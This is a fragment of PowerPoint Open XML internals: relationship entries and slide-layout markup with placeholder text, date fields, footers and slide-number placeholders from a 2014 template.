Target="../tags/tag10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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag14.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag11.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12.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08.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag106.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag107.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11.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag112.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag113.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag114.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag109.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag110.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17.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag118.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag119.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag120.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag115.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag116.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23.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag124.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag125.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag121.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag122.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28.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag129.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag130.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag126.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag127.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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag20.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16.xml"/><Relationship Id="rId2"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3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag24.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag25.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21.xml"/><Relationship Id="rId2"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8.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag26.xml"/><Relationship Id="rId2"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1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag32.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag33.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag34.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag35.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag36.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag29.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag3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9.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag40.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag37.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag38.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3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag41.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag42.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6.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag47.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag48.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag49.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag44.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag4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lvl1pPr>
              <a:defRPr b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-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custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E86D5785-7D68-8640-9C7E-4CB4415E4AAF}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/7/14</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04657582"/>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custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>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custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2A0AB15E-FFE3-4B47-B9E2-DD4B5E55497A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/7/14</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3218236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custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>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custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{81FD670A-49D5-6B44-876E-D2BDD5B5BF5A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/7/14</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4153715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custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{653081F9-3F3A-B044-B1B3-3E71C9E162B6}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/7/14</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325644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lvl1pPr>
              <a:defRPr b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-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custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E86D5785-7D68-8640-9C7E-4CB4415E4AAF}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/7/14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>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62599522"/>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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>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custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{70FB8C43-0D6C-3C4D-8072-45F708119B8E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/7/14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>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99814593"/>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457200" y="3034508"/>
            <a:ext cx="6951274" cy="1308892"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4000" b="0" i="0" cap="none">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Section Header</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="492724" y="1524000"/>
            <a:ext cx="6951274" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" anchor="b" anchorCtr="0"/>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custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{37AABCFA-591C-9145-B44A-9EFDDC32D4B1}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/7/14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>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61854685"/>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2">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1264380" y="2013343"/>
            <a:ext cx="6951274" cy="753670"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4000" b="0" i="0" cap="none">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Section Header 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1264380" y="2919413"/>
            <a:ext cx="6951274" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>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custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D01F7D1C-C9EC-E743-9063-B0846E758DFA}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/7/14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>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95822235"/>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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447800"/>
            <a:ext cx="4038600" cy="4678363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="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custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="1447800"/>
            <a:ext cx="4038600" cy="4678363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="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7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{40582EA0-B875-B64A-B17C-15E030E9CF15}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/7/14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Slide Number Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}"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1711705654"/>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custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1535113"/>
            <a:ext cx="4040188" cy="446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custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="4040188"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custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645025" y="1535113"/>
            <a:ext cx="4041775" cy="446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custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645025" y="1981200"/>
            <a:ext cx="4041775"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custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{74391607-EAAA-2946-9E02-E1C11496083C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/7/14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
            <p:custDataLst>
              <p:tags r:id="rId8"/>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21783401"/>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54391509-7D79-C647-92BF-4A0564F0C41A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/7/14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
            <p:custDataLst>
              <p:tags r:id="rId4"/>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4268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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>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custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{70FB8C43-0D6C-3C4D-8072-45F708119B8E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/7/14</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389415723"/>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FBD64FD0-82A6-144B-A86D-7BBA3EAF78C2}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/7/14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
            <p:custDataLst>
              <p:tags r:id="rId3"/>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7015571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noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4800" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>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custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{82B93CA3-029B-EF42-8B8C-890C6E340BE0}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/7/14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
